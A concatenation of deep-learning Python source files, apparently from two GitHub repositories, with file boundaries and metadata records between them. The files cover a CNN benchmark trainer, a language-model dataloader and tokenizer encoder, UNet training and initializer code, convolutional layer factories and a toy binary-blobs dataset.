net = C.layers.Convolution2D((1, 3), 180, activation=C.ops.relu, pad=False)(net)
net = C.layers.MaxPooling((1, 2), strides=2)(net)
net = C.layers.Convolution2D((1, 2), 180, activation=C.ops.relu, pad=False)(net)
net = C.layers.Convolution2D((1, 1), 180, activation=C.ops.relu, pad=False)(net)
net = C.layers.Dense(2048)(net)
net = C.layers.Dense(2048)(net)
net = C.layers.Dense(output_num, activation=None)(net)
return net
```
#### File: benchmark/models/nn.py
```python
import os
import time
from functools import partial
# https://neon.nervanasys.com/index.html/models.html
# NOTE: despite the file name, this trainer is written against mxnet.
import mxnet as mx
from tqdm import tqdm
class Trainer(object):
def __init__(self, model, ngpu, options=None):
self.model = model
self.ngpu = ngpu
self.gpu_mode = True if ngpu >= 1 else False
if self.gpu_mode:
self.gpus = [mx.gpu(i) for i in range(ngpu)]
if options['benchmark_mode']:
os.environ['MXNET_CUDNN_AUTOTUNE_DEFAULT'] = '1'
self.progressbar = options['progressbar']
def set_optimizer(self, opt_type, opt_conf):
if opt_type == 'SGD':
self.opt_type = 'sgd'
self.lr = opt_conf['lr']
self.metric = mx.metric.CrossEntropy()
else:
raise NotImplementedError
def run(self, iterator, mode='train'):
report = dict()
# setup mxnet module
data = mx.sym.var('data')
module = mx.mod.Module(symbol=self.model(data),
context=self.gpus,
data_names=['data'],
label_names=['softmax_label'])
B = iterator.batch_size
C, H, W = iterator.image_shape
data_shape = (B, C, H, W)
label_shape = (B,)
# https://mxnet.incubator.apache.org/tutorials/basic/data.html
        module.bind(data_shapes=list(zip(['data'], [data_shape])),
                    label_shapes=list(zip(['softmax_label'], [label_shape])))
module.init_params(initializer=mx.init.Xavier(magnitude=2.))
module.init_optimizer(optimizer=self.opt_type,
optimizer_params=(('learning_rate', self.lr),))
self.metric.reset()
## end setup
if self.progressbar:
iterator = tqdm(iterator)
for idx, (x, t) in enumerate(iterator):
total_s = time.perf_counter()
x = [mx.nd.array(x[i, ...].reshape(1, C, H, W)) for i in range(B)]
t = [mx.nd.array([t[i]]) for i in range(B)]
batch = mx.io.DataBatch(x, t)
forward_s = time.perf_counter()
module.forward(batch, is_train=True)
forward_e = time.perf_counter()
module.update_metric(self.metric, batch.label)
backward_s = time.perf_counter()
module.backward()
backward_e = time.perf_counter()
module.update()
total_e = time.perf_counter()
report[idx] = dict(
forward=forward_e - forward_s,
backward=backward_e - backward_s,
total=total_e - total_s
)
return report
class CNN(object):
def __init__(self, channel, xdim, ydim, output_num):
self.cnn = partial(cnn,
channel=channel,
xdim=xdim,
ydim=ydim,
output_num=output_num)
def get_func(self):
return self.cnn
def __call__(self, x):
return self.cnn(x)
def cnn(x, channel, xdim, ydim, output_num):
net = mx.sym.Convolution(data=x, kernel=(xdim, 3), num_filter=180)
net = mx.sym.Activation(data=net, act_type='relu')
net = mx.sym.Convolution(data=net, kernel=(1, 3), num_filter=180)
net = mx.sym.Activation(data=net, act_type='relu')
net = mx.sym.Pooling(data=net, pool_type='max', kernel=(1, 2), stride=(2, 2))
net = mx.sym.Convolution(data=net, kernel=(1, 3), num_filter=180)
net = mx.sym.Activation(data=net, act_type='relu')
net = mx.sym.Convolution(data=net, kernel=(1, 3), num_filter=180)
net = mx.sym.Activation(data=net, act_type='relu')
net = mx.sym.Pooling(data=net, pool_type='max', kernel=(1, 2), stride=(2, 2))
net = mx.sym.Convolution(data=net, kernel=(1, 2), num_filter=180)
net = mx.sym.Activation(data=net, act_type='relu')
net = mx.sym.Convolution(data=net, kernel=(1, 1), num_filter=180)
net = mx.sym.Activation(data=net, act_type='relu')
net = mx.sym.flatten(data=net)
net = mx.sym.FullyConnected(data=net, num_hidden=2048)
net = mx.sym.Activation(data=net, act_type='relu')
net = mx.sym.FullyConnected(data=net, num_hidden=2048)
net = mx.sym.Activation(data=net, act_type='relu')
net = mx.sym.FullyConnected(data=net, num_hidden=output_num)
net = mx.sym.SoftmaxOutput(data=net, name='softmax')
#a = mx.viz.plot_network(net)
#a.render('cnn.net')
return net
``` |
{
"source": "0h-n0/first_deep",
"score": 2
} |
#### File: first_deep/libs/data.py
```python
import math
from pathlib import Path
import torch.utils.data
from torch.utils.data import Dataset
from torch.utils.data.sampler import Sampler
from .reserved_tokens import UNKNOWN_TOKEN
from .reserved_tokens import EOS_TOKEN
from .encoders import IdentityEncoder
class BPTTSampler(Sampler):
def __init__(self, data, bptt_length, type_='source'):
self.data = data
self.bptt_length = bptt_length
self.type = type_
def __iter__(self):
for i in range(0, len(self.data) - 1, self.bptt_length):
seq_length = min(self.bptt_length, len(self.data) - 1 - i)
if self.type == 'source':
yield slice(i, i + seq_length)
if self.type == 'target':
yield slice(i + 1, i + 1 + seq_length)
def __len__(self):
return math.ceil((len(self.data) - 1) / self.bptt_length)
class BPTTBatchSampler(object):
def __init__(self, data, bptt_length, batch_size, drop_last, type_='source'):
self.data = data
self.batch_size = batch_size
self.drop_last = drop_last
chunk_sizes = [math.floor(len(data) / batch_size)] * batch_size
# Distribute the remaining elements to some chunks
if not self.drop_last:
remainder = len(data) - sum(chunk_sizes)
for i in range(remainder):
chunk_sizes[i] += 1
self.samplers = [{
'offset': sum(chunk_sizes[:i]),
'sampler': BPTTSampler(range(chunk_sizes[i]), bptt_length, type_=type_)
} for i in range(batch_size)]
def __iter__(self):
self.iterators = [iter(value['sampler']) for value in self.samplers]
while True:
batch = []
for i, iterator in enumerate(self.iterators):
try:
# Adjust the sampler indices to the offset
offset = self.samplers[i]['offset']
slice_ = next(iterator)
batch.append(slice(slice_.start + offset, slice_.stop + offset))
except StopIteration:
pass
# Samplers are all empty
if (len(batch) == 0):
break
yield batch
def __len__(self):
return len(self.samplers[0]['sampler'])
class DummyDataset(Dataset):
def __init__(self, data_source, source_sampler, target_sampler):
self.data_source = data_source
self.source_sampler = list(source_sampler)
self.target_sampler = list(target_sampler)
self.size = len(self.source_sampler)
def __getitem__(self, idx):
data = torch.stack([self.data_source[i] for i in self.source_sampler[idx]])
targets = torch.stack([self.data_source[i] for i in self.target_sampler[idx]]).view(-1)
return data, targets
def __len__(self):
return self.size
class PTBDataloaderFactory(object):
    train_data_path = ''
    test_data_path = ''
    valid_data_path = ''
@classmethod
def set_train_data_path(cls, path):
cls.train_data_path = path
@classmethod
def set_test_data_path(cls, path):
cls.test_data_path = path
@classmethod
def set_valid_data_path(cls, path):
cls.valid_data_path = path
def __init__(self, batch_size=128, test_batch_size=1024, bptt_length=10, num_workers=3, shuffle=True):
self.batch_size = batch_size
self.test_batch_size = test_batch_size
self.bptt_length = bptt_length
self.num_workers = num_workers
self.shuffle = shuffle
self.raw_data = dict(
train=self._preprocess(self.train_data_path),
valid=self._preprocess(self.valid_data_path),
test=self._preprocess(self.test_data_path))
self.encoder = IdentityEncoder(self.raw_data['train'] +
self.raw_data['valid'] +
self.raw_data['test'])
self.ntokens = self.encoder.vocab_size
self.data = dict(
train=self.encoder.encode(self.raw_data['train']),
valid=self.encoder.encode(self.raw_data['valid']),
test=self.encoder.encode(self.raw_data['test']))
def get_dataloader(self, mode='train'):
source_sampler = self._sampler(self.data[mode], self.bptt_length, self.batch_size, 'source')
target_sampler = self._sampler(self.data[mode], self.bptt_length, self.batch_size, 'target')
dataset = DummyDataset(self.data[mode], source_sampler, target_sampler)
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=1,
shuffle=self.shuffle,
num_workers=self.num_workers)
return dataloader
def _sampler(self, text, bptt_length, batch_size, type_):
return BPTTBatchSampler(text, bptt_length, batch_size, True, type_)
def _preprocess(self, path):
full_path = Path(path).expanduser().resolve()
text = []
with full_path.open(encoding='utf-8') as f:
for line in f:
text.extend(line.replace('<unk>', UNKNOWN_TOKEN).split())
text.append(EOS_TOKEN)
return text
```
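`BPTTSampler` cuts one long token stream into contiguous windows, and the `type_='target'` variant yields the same windows shifted right by one token, which is the usual next-token setup for language modelling. A small sketch of the slices it produces; the import path `libs.data` is assumed from the file layout:
```python
from libs.data import BPTTSampler
data = list(range(10))  # placeholder token ids 0..9
src = list(BPTTSampler(data, bptt_length=3, type_='source'))
tgt = list(BPTTSampler(data, bptt_length=3, type_='target'))
# src -> [slice(0, 3), slice(3, 6), slice(6, 9)]
# tgt -> [slice(1, 4), slice(4, 7), slice(7, 10)]
# each target window is its source window shifted right by one token
```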
#### File: first_deep/libs/static_encoder.py
```python
from collections import Counter
import torch
from .reserved_tokens import EOS_INDEX
from .reserved_tokens import RESERVED_ITOS
from .reserved_tokens import UNKNOWN_INDEX
def _tokenize(s):
return s.split()
class Encoder(object):
""" Base class for a text encoder.
"""
def __init__(self): # pragma: no cover
raise NotImplementedError
def encode(self, string): # pragma: no cover
""" Returns a :class:`torch.LongTensor` encoding of the `text`. """
raise NotImplementedError
def batch_encode(self, strings, *args, **kwargs):
""" Returns a :class:`list` of :class:`torch.LongTensor` encoding of the `text`. """
return [self.encode(s, *args, **kwargs) for s in strings]
def decode(self, tensor): # pragma: no cover
""" Given a :class:`torch.Tensor`, returns a :class:`str` representing the decoded text.
Note that, depending on the tokenization method, the decoded version is not guaranteed to be
the original text.
"""
raise NotImplementedError
@property
def vocab_size(self):
""" Return the size (:class:`int`) of the vocabulary. """
return len(self.vocab)
@property
def vocab(self): # pragma: no cover
""" Returns the vocabulary (:class:`list`) used to encode text. """
return NotImplementedError
class StaticTokenizerEncoder(Encoder):
""" Encodes the text using a tokenizer.
Args:
sample (list of strings): Sample of data to build dictionary on.
min_occurrences (int, optional): Minimum number of occurrences for a token to be added to
dictionary.
tokenize (callable): :class:``callable`` to tokenize a string.
append_eos (bool, optional): If `True` append EOS token onto the end to the encoded vector.
reserved_tokens (list of str, optional): Tokens added to dictionary; reserving the first
`len(reserved_tokens)` indexes.
Example:
>>> encoder = StaticTokenizerEncoder(["This ain't funny.", "Don't?"],
tokenize=lambda s: s.split())
>>> encoder.encode("This ain't funny.")
5
6
7
[torch.LongTensor of size 3]
>>> encoder.vocab
['<pad>', '<unk>', '</s>', '<s>', '<copy>', 'This', "ain't", 'funny.', "Don't?"]
>>> encoder.decode(encoder.encode("This ain't funny."))
"This ain't funny."
"""
def __init__(self,
sample,
min_occurrences=1,
append_eos=False,
tokenize=_tokenize,
reserved_tokens=RESERVED_ITOS):
if not isinstance(sample, list):
raise TypeError('Sample must be a list of strings.')
self.tokenize = tokenize
self.append_eos = append_eos
self.tokens = Counter()
for text in sample:
self.tokens.update(self.tokenize(text))
self.itos = reserved_tokens.copy()
self.stoi = {token: index for index, token in enumerate(reserved_tokens)}
for token, count in self.tokens.items():
if count >= min_occurrences:
self.itos.append(token)
self.stoi[token] = len(self.itos) - 1
@property
def vocab(self):
return self.itos
def encode(self, text, eos_index=EOS_INDEX, unknown_index=UNKNOWN_INDEX):
text = self.tokenize(text)
vector = [self.stoi.get(token, unknown_index) for token in text]
if self.append_eos:
vector.append(eos_index)
return torch.LongTensor(vector)
def decode(self, tensor):
tokens = [self.itos[index] for index in tensor]
return ' '.join(tokens)
``` |
{
"source": "0h-n0/inferno",
"score": 3
} |
#### File: inferno/examples/plot_cheap_unet.py
```python
import matplotlib.pyplot as plt
import torch
from torch import nn
import numpy
##############################################################################
# determine whether we have a gpu
# and should use cuda
USE_CUDA = torch.cuda.is_available()
##############################################################################
# Dataset
# --------------
# For simplicity we will use a toy dataset where we need to perform
# a binary segmentation task.
from inferno.io.box.binary_blobs import get_binary_blob_loaders
# convert labels from long to float as needed by
# binary cross entropy loss
def label_transform(x):
return torch.from_numpy(x).float()
#label_transform = lambda x : torch.from_numpy(x).float()
train_loader, test_loader, validate_loader = get_binary_blob_loaders(
size=8, # how many images per {train,test,validate}
train_batch_size=2,
length=256, # <= size of the images
    gaussian_noise_sigma=1.4, # <= how noisy the images are
train_label_transform = label_transform,
validate_label_transform = label_transform
)
image_channels = 1 # <-- number of channels of the image
pred_channels = 1 # <-- number of channels needed for the prediction
if False:
##############################################################################
# Visualize Dataset
# ~~~~~~~~~~~~~~~~~~~~~~
fig = plt.figure()
for i,(image, target) in enumerate(train_loader):
ax = fig.add_subplot(1, 2, 1)
ax.imshow(image[0,0,...])
ax.set_title('raw data')
ax = fig.add_subplot(1, 2, 2)
ax.imshow(target[0,...])
ax.set_title('ground truth')
break
fig.tight_layout()
plt.show()
##############################################################################
# Training
# ----------------------------
# To train the unet, we use the infernos Trainer class of inferno.
# Since we train many models later on in this example we encapsulate
# the training in a function (see :ref:`sphx_glr_auto_examples_trainer.py` for
# an example dedicated to the trainer itself).
from inferno.trainers import Trainer
from inferno.utils.python_utils import ensure_dir
def train_model(model, loaders, **kwargs):
trainer = Trainer(model)
trainer.build_criterion('BCEWithLogitsLoss')
trainer.build_optimizer('Adam', lr=kwargs.get('lr', 0.0001))
#trainer.validate_every((kwargs.get('validate_every', 10), 'epochs'))
#trainer.save_every((kwargs.get('save_every', 10), 'epochs'))
#trainer.save_to_directory(ensure_dir(kwargs.get('save_dir', 'save_dor')))
trainer.set_max_num_epochs(kwargs.get('max_num_epochs', 20))
# bind the loaders
trainer.bind_loader('train', loaders[0])
trainer.bind_loader('validate', loaders[1])
if USE_CUDA:
trainer.cuda()
# do the training
trainer.fit()
return trainer
##############################################################################
# Prediction
# ----------------------------
# The trainer contains the trained model and we can do predictions.
# We use :code:`unwrap` to convert the results to numpy arrays.
# Since we want to do many prediction we encapsulate the
# the prediction in a function
from inferno.utils.torch_utils import unwrap
def predict(trainer, test_loader, save_dir=None):
trainer.eval_mode()
for image, target in test_loader:
# transfer image to gpu
image = image.cuda() if USE_CUDA else image
# get batch size from image
batch_size = image.size()[0]
for b in range(batch_size):
prediction = trainer.apply_model(image)
prediction = torch.nn.functional.sigmoid(prediction)
image = unwrap(image, as_numpy=True, to_cpu=True)
prediction = unwrap(prediction, as_numpy=True, to_cpu=True)
target = unwrap(target, as_numpy=True, to_cpu=True)
fig = plt.figure()
ax = fig.add_subplot(2, 2, 1)
ax.imshow(image[b,0,...])
ax.set_title('raw data')
ax = fig.add_subplot(2, 2, 2)
ax.imshow(target[b,...])
ax.set_title('ground truth')
ax = fig.add_subplot(2, 2, 4)
ax.imshow(prediction[b,...])
ax.set_title('prediction')
fig.tight_layout()
plt.show()
##############################################################################
# Custom UNet
# ----------------------------
# Often one needs to have a UNet with custom layers.
# Here we show how to implement such a customized UNet.
# To this end we derive from :code:`UNetBase`.
# For the sake of this example we will create
# a Unet which uses depthwise convolutions and might be trained on a CPU
from inferno.extensions.models import UNetBase
from inferno.extensions.layers import ConvSELU2D, ConvReLU2D, ConvELU2D, ConvSigmoid2D,Conv2D,ConvActivation
class CheapConv(nn.Module):
def __init__(self, in_channels, out_channels, activated):
super(CheapConv, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
if activated:
self.convs = torch.nn.Sequential(
ConvActivation(in_channels=in_channels, out_channels=in_channels, depthwise=True, kernel_size=(3, 3), activation='ReLU', dim=2),
ConvReLU2D(in_channels=in_channels, out_channels=out_channels, kernel_size=(1,1))
)
else:
self.convs = torch.nn.Sequential(
ConvActivation(in_channels=in_channels, out_channels=in_channels, depthwise=True, kernel_size=(3, 3), activation='ReLU', dim=2),
Conv2D(in_channels=in_channels, out_channels=out_channels, kernel_size=(1,1))
)
def forward(self, x):
assert x.shape[1] == self.in_channels,"input has wrong number of channels"
x = self.convs(x)
assert x.shape[1] == self.out_channels,"output has wrong number of channels"
return x
class CheapConvBlock(nn.Module):
def __init__(self, in_channels, out_channels, activated):
super(CheapConvBlock, self).__init__()
self.activated = activated
self.in_channels = in_channels
self.out_channels = out_channels
if(in_channels != out_channels):
self.start = ConvReLU2D(in_channels=in_channels, out_channels=out_channels, kernel_size=(1,1))
else:
self.start = None
self.conv_a = CheapConv(in_channels=out_channels, out_channels=out_channels, activated=True)
self.conv_b = CheapConv(in_channels=out_channels, out_channels=out_channels, activated=False)
self.activation = torch.nn.ReLU()
def forward(self, x):
x_input = x
if self.start is not None:
x_input = self.start(x_input)
x = self.conv_a(x_input)
x = self.conv_b(x)
x = x + x_input
if self.activated:
x = self.activation(x)
return x
class MySimple2DCpUnet(UNetBase):
def __init__(self, in_channels, out_channels, depth=3, residual=False, **kwargs):
super(MySimple2DCpUnet, self).__init__(in_channels=in_channels, out_channels=out_channels,
dim=2, depth=depth, **kwargs)
def conv_op_factory(self, in_channels, out_channels, part, index):
# last?
last = part == 'up' and index==0
return CheapConvBlock(in_channels=in_channels, out_channels=out_channels, activated=not last),False
from inferno.extensions.layers import RemoveSingletonDimension
model_b = torch.nn.Sequential(
CheapConv(in_channels=image_channels, out_channels=4, activated=True),
MySimple2DCpUnet(in_channels=4, out_channels=pred_channels) ,
RemoveSingletonDimension(dim=1)
)
###################################################
# do the training (with the same functions as before)
trainer = train_model(model=model_b, loaders=[train_loader, validate_loader], save_dir='model_b', lr=0.001)
###################################################
# do the training (with the same functions as before)1
predict(trainer=trainer, test_loader=test_loader)
```
#### File: extensions/initializers/base.py
```python
import torch.nn.init as init
__all__ = ['Initializer',
'Initialization',
'WeightInitFunction',
'BiasInitFunction',
'TensorInitFunction']
class Initializer(object):
"""
Base class for all initializers.
"""
# TODO Support LSTMs and GRUs
VALID_LAYERS = {'Conv1d', 'Conv2d', 'Conv3d',
'ConvTranspose1d', 'ConvTranspose2d', 'ConvTranspose3d',
'Linear', 'Bilinear',
'Embedding'}
def __call__(self, module):
module_class_name = module.__class__.__name__
if module_class_name in self.VALID_LAYERS:
# Apply to weight and bias
try:
if hasattr(module, 'weight'):
self.call_on_weight(module.weight.data)
except NotImplementedError:
# Don't cry if it's not implemented
pass
try:
if hasattr(module, 'bias'):
self.call_on_bias(module.bias.data)
except NotImplementedError:
pass
return module
def call_on_bias(self, tensor):
return self.call_on_tensor(tensor)
def call_on_weight(self, tensor):
return self.call_on_tensor(tensor)
def call_on_tensor(self, tensor):
raise NotImplementedError
@classmethod
def initializes_weight(cls):
return 'call_on_tensor' in cls.__dict__ or 'call_on_weight' in cls.__dict__
@classmethod
def initializes_bias(cls):
return 'call_on_tensor' in cls.__dict__ or 'call_on_bias' in cls.__dict__
class Initialization(Initializer):
def __init__(self, weight_initializer=None, bias_initializer=None):
if weight_initializer is None:
self.weight_initializer = Initializer()
else:
if isinstance(weight_initializer, Initializer):
assert weight_initializer.initializes_weight()
self.weight_initializer = weight_initializer
elif isinstance(weight_initializer, str):
init_function = getattr(init, weight_initializer, None)
assert init_function is not None
self.weight_initializer = WeightInitFunction(init_function=init_function)
else:
                # Provision for weight_initializer to be a function
assert callable(weight_initializer)
self.weight_initializer = WeightInitFunction(init_function=weight_initializer)
if bias_initializer is None:
self.bias_initializer = Initializer()
else:
if isinstance(bias_initializer, Initializer):
                assert bias_initializer.initializes_bias()
self.bias_initializer = bias_initializer
elif isinstance(bias_initializer, str):
init_function = getattr(init, bias_initializer, None)
assert init_function is not None
self.bias_initializer = BiasInitFunction(init_function=init_function)
else:
assert callable(bias_initializer)
self.bias_initializer = BiasInitFunction(init_function=bias_initializer)
def call_on_weight(self, tensor):
return self.weight_initializer.call_on_weight(tensor)
def call_on_bias(self, tensor):
return self.bias_initializer.call_on_bias(tensor)
class WeightInitFunction(Initializer):
def __init__(self, init_function, *init_function_args, **init_function_kwargs):
super(WeightInitFunction, self).__init__()
assert callable(init_function)
self.init_function = init_function
self.init_function_args = init_function_args
self.init_function_kwargs = init_function_kwargs
def call_on_weight(self, tensor):
return self.init_function(tensor, *self.init_function_args, **self.init_function_kwargs)
class BiasInitFunction(Initializer):
def __init__(self, init_function, *init_function_args, **init_function_kwargs):
super(BiasInitFunction, self).__init__()
assert callable(init_function)
self.init_function = init_function
self.init_function_args = init_function_args
self.init_function_kwargs = init_function_kwargs
def call_on_bias(self, tensor):
return self.init_function(tensor, *self.init_function_args, **self.init_function_kwargs)
class TensorInitFunction(Initializer):
def __init__(self, init_function, *init_function_args, **init_function_kwargs):
super(TensorInitFunction, self).__init__()
assert callable(init_function)
self.init_function = init_function
self.init_function_args = init_function_args
self.init_function_kwargs = init_function_kwargs
def call_on_tensor(self, tensor):
return self.init_function(tensor, *self.init_function_args, **self.init_function_kwargs)
```
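`Initialization` pairs a weight initializer with a bias initializer and accepts `Initializer` instances, plain callables, or the name of any function in `torch.nn.init`; only module types listed in `Initializer.VALID_LAYERS` are touched. A short usage sketch (the toy model and the import path are illustrative assumptions):
```python
import torch.nn as nn
from inferno.extensions.initializers import Initialization
# strings are resolved via getattr(torch.nn.init, name)
init = Initialization(weight_initializer='xavier_uniform_',
                      bias_initializer='zeros_')
model = nn.Sequential(nn.Linear(16, 32), nn.ReLU(), nn.Linear(32, 10))
model.apply(init)  # ReLU is skipped, both Linear layers are (re-)initialized
```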
#### File: extensions/layers/convolutional.py
```python
import torch.nn as nn
import sys
import functools
from ..initializers import (
OrthogonalWeightsZeroBias,
KaimingNormalWeightsZeroBias,
SELUWeightsZeroBias,
)
from ..initializers import Initializer
from .normalization import BatchNormND
from .activations import SELU
from ...utils.exceptions import assert_, ShapeError
from ...utils.partial_cls import register_partial_cls
# we append to this later on
__all__ = [
"GlobalConv2D",
]
_all = __all__
register_partial_cls_here = functools.partial(register_partial_cls, module=__name__)
class ConvActivation(nn.Module):
"""Convolutional layer with 'SAME' padding by default followed by an activation."""
def __init__(
self,
in_channels,
out_channels,
kernel_size,
dim,
activation,
stride=1,
dilation=1,
groups=None,
depthwise=False,
bias=True,
deconv=False,
initialization=None,
valid_conv=False,
):
super(ConvActivation, self).__init__()
# Validate dim
assert_(
dim in [1, 2, 3],
"`dim` must be one of [1, 2, 3], got {}.".format(dim),
ShapeError,
)
self.dim = dim
# Check if depthwise
if depthwise:
# We know that in_channels == out_channels, but we also want a consistent API.
# As a compromise, we allow that out_channels be None or 'auto'.
            out_channels = in_channels if out_channels in [None, "auto"] else out_channels
assert_(
in_channels == out_channels,
"For depthwise convolutions, number of input channels (given: {}) "
"must equal the number of output channels (given {}).".format(
in_channels, out_channels
),
ValueError,
)
assert_(
groups is None or groups == in_channels,
"For depthwise convolutions, groups (given: {}) must "
"equal the number of channels (given: {}).".format(groups, in_channels),
)
groups = in_channels
else:
groups = 1 if groups is None else groups
self.depthwise = depthwise
if valid_conv:
self.conv = getattr(nn, "Conv{}d".format(self.dim))(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
dilation=dilation,
groups=groups,
bias=bias,
)
elif not deconv:
# Get padding
padding = self.get_padding(kernel_size, dilation)
self.conv = getattr(nn, "Conv{}d".format(self.dim))(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
padding=padding,
stride=stride,
dilation=dilation,
groups=groups,
bias=bias,
)
else:
self.conv = getattr(nn, "ConvTranspose{}d".format(self.dim))(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
dilation=dilation,
groups=groups,
bias=bias,
)
if initialization is None:
pass
elif isinstance(initialization, Initializer):
self.conv.apply(initialization)
else:
raise NotImplementedError
if isinstance(activation, str):
self.activation = getattr(nn, activation)()
elif isinstance(activation, nn.Module):
self.activation = activation
elif activation is None:
self.activation = None
else:
raise NotImplementedError
def forward(self, input):
conved = self.conv(input)
if self.activation is not None:
activated = self.activation(conved)
else:
# No activation
activated = conved
return activated
def _pair_or_triplet(self, object_):
if isinstance(object_, (list, tuple)):
assert len(object_) == self.dim
return object_
else:
object_ = [object_] * self.dim
return object_
def _get_padding(self, _kernel_size, _dilation):
assert isinstance(_kernel_size, int)
assert isinstance(_dilation, int)
assert _kernel_size % 2 == 1
return ((_kernel_size - 1) // 2) * _dilation
def get_padding(self, kernel_size, dilation):
kernel_size = self._pair_or_triplet(kernel_size)
dilation = self._pair_or_triplet(dilation)
padding = [
self._get_padding(_kernel_size, _dilation)
for _kernel_size, _dilation in zip(kernel_size, dilation)
]
return tuple(padding)
# for consistency
ConvActivationND = ConvActivation
# noinspection PyUnresolvedReferences
class _BNReLUSomeConv(object):
def forward(self, input):
normed = self.batchnorm(input)
activated = self.activation(normed)
conved = self.conv(activated)
return conved
class BNReLUConvBaseND(_BNReLUSomeConv, ConvActivation):
def __init__(self, in_channels, out_channels, kernel_size, dim, stride=1, dilation=1, deconv=False):
super(BNReLUConvBaseND, self).__init__(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
dim=dim,
stride=stride,
activation=nn.ReLU(inplace=True),
dilation=dilation,
deconv=deconv,
initialization=KaimingNormalWeightsZeroBias(0),
)
self.batchnorm = BatchNormND(dim, in_channels)
def _register_conv_cls(conv_name, fix=None, default=None):
if fix is None:
fix = {}
if default is None:
default = {}
# simple conv activation
activations = ["ReLU", "ELU", "Sigmoid", "SELU", ""]
init_map = {
"ReLU": KaimingNormalWeightsZeroBias,
"SELU": SELUWeightsZeroBias
}
for activation_str in activations:
        cls_name = "{}{}ND".format(conv_name, activation_str)
__all__.append(cls_name)
initialization_cls = init_map.get(activation_str, OrthogonalWeightsZeroBias)
if activation_str == "":
activation = None
_fix = {**fix}
_default = {'activation':None}
elif activation_str == "SELU":
activation = nn.SELU(inplace=True)
_fix={**fix, 'activation':activation}
_default = {**default}
else:
activation = activation_str
_fix={**fix, 'activation':activation}
_default = {**default}
register_partial_cls_here(ConvActivation, cls_name,
fix=_fix,
default={**_default, 'initialization':initialization_cls()}
)
for dim in [1, 2, 3]:
cls_name = "{}{}{}D".format(conv_name,activation_str, dim)
__all__.append(cls_name)
register_partial_cls_here(ConvActivation, cls_name,
fix={**_fix, 'dim':dim},
default={**_default, 'initialization':initialization_cls()}
)
def _register_bnr_conv_cls(conv_name, fix=None, default=None):
if fix is None:
fix = {}
if default is None:
default = {}
    cls_name = "BNReLU{}ND".format(conv_name)
    __all__.append(cls_name)
    register_partial_cls_here(BNReLUConvBaseND, cls_name, fix=fix, default=default)
for dim in [1, 2, 3]:
cls_name = "BNReLU{}{}D".format(conv_name, dim)
__all__.append(cls_name)
register_partial_cls_here(BNReLUConvBaseND, cls_name,
fix={**fix, 'dim':dim},
default=default)
# conv classes
_register_conv_cls("Conv")
_register_conv_cls("ValidConv", fix=dict(valid_conv=True))
_register_conv_cls("Deconv", fix=dict(deconv=True), default=dict(kernel_size=2, stride=2))
_register_conv_cls("StridedConv", default=dict(stride=2))
_register_conv_cls("DilatedConv", fix=dict(dilation=2))
_register_conv_cls("DepthwiseConv", fix=dict(deconv=False, depthwise=True), default=dict(out_channels='auto'))
# BatchNormRelu classes
_register_bnr_conv_cls("Conv", fix=dict(deconv=False))
_register_bnr_conv_cls("Deconv", fix=dict(deconv=True))
_register_bnr_conv_cls("StridedConv", default=dict(stride=2))
_register_bnr_conv_cls("DilatedConv", default=dict(dilation=2))
_register_bnr_conv_cls("DepthwiseConv", fix=dict(deconv=False, depthwise=True), default=dict(out_channels='auto'))
del _register_conv_cls
del _register_bnr_conv_cls
class GlobalConv2D(nn.Module):
"""From https://arxiv.org/pdf/1703.02719.pdf
Main idea: we can have a bigger kernel size computationally acceptable
if we separate 2D-conv in 2 1D-convs """
def __init__(
self,
in_channels,
out_channels,
kernel_size,
local_conv_type,
activation=None,
use_BN=False,
**kwargs
):
super(GlobalConv2D, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
assert isinstance(kernel_size, (int, list, tuple))
if isinstance(kernel_size, int):
kernel_size = (kernel_size,) * 2
self.kwargs = kwargs
self.conv1a = local_conv_type(
in_channels=self.in_channels,
out_channels=self.out_channels,
kernel_size=(kernel_size[0], 1),
**kwargs
)
self.conv1b = local_conv_type(
in_channels=self.out_channels,
out_channels=self.out_channels,
kernel_size=(1, kernel_size[1]),
**kwargs
)
self.conv2a = local_conv_type(
in_channels=self.in_channels,
out_channels=self.out_channels,
kernel_size=(1, kernel_size[1]),
**kwargs
)
self.conv2b = local_conv_type(
in_channels=self.out_channels,
out_channels=self.out_channels,
kernel_size=(kernel_size[0], 1),
**kwargs
)
if use_BN:
self.batchnorm = nn.BatchNorm2d(self.out_channels)
else:
self.batchnorm = None
self.activation = activation
def forward(self, input_):
out1 = self.conv1a(input_)
out1 = self.conv1b(out1)
out2 = self.conv2a(input_)
out2 = self.conv2b(out2)
out = out1.add(1, out2)
if self.activation is not None:
out = self.activation(out)
if self.batchnorm is not None:
out = self.batchnorm(out)
return out
```
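`GlobalConv2D` implements the large-kernel idea referenced in its docstring: a k x k convolution is replaced by two branches of stacked k x 1 and 1 x k convolutions whose outputs are summed, so the receptive field grows with k while the cost stays roughly linear in k. A rough usage sketch; picking `ConvReLU2D` (which applies 'SAME' padding itself) as the `local_conv_type` and the import path are assumptions:
```python
import torch
import torch.nn as nn
from inferno.extensions.layers import ConvReLU2D, GlobalConv2D
# 'SAME' padding keeps both 1-D branches at 64x64 so they can be summed.
gconv = GlobalConv2D(in_channels=3, out_channels=8, kernel_size=7,
                     local_conv_type=ConvReLU2D,
                     activation=nn.ReLU(), use_BN=True)
y = gconv(torch.rand(2, 3, 64, 64))  # -> torch.Size([2, 8, 64, 64])
```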
#### File: io/box/binary_blobs.py
```python
import torch.utils.data as data
import skimage.data
import skimage.transform
import numpy
from operator import mul
from functools import reduce
class BinaryBlobs(data.Dataset):
def __init__(self, size=20, length=512, blob_size_fraction=0.1,
n_dim=2, volume_fraction=0.5,split='train',
uniform_noise_range=(-1.2, 1.2),
gaussian_noise_sigma=1.2,
noise_scale_factor=8,
image_transform=None,
label_transform=None,
joint_transform=None):
# how many images are in the dataset
self.size = size
# blob related members
self.length = length
self.blob_size_fraction = blob_size_fraction
self.n_dim = n_dim
self.volume_fraction = volume_fraction
# which split {'train', 'test', 'validate'}
self.split = split
# noise related members
self.uniform_noise_range = uniform_noise_range
self.gaussian_noise_sigma = float(gaussian_noise_sigma)
self.noise_scale_factor = noise_scale_factor
# transforms
self.image_transform = image_transform
self.label_transform = label_transform
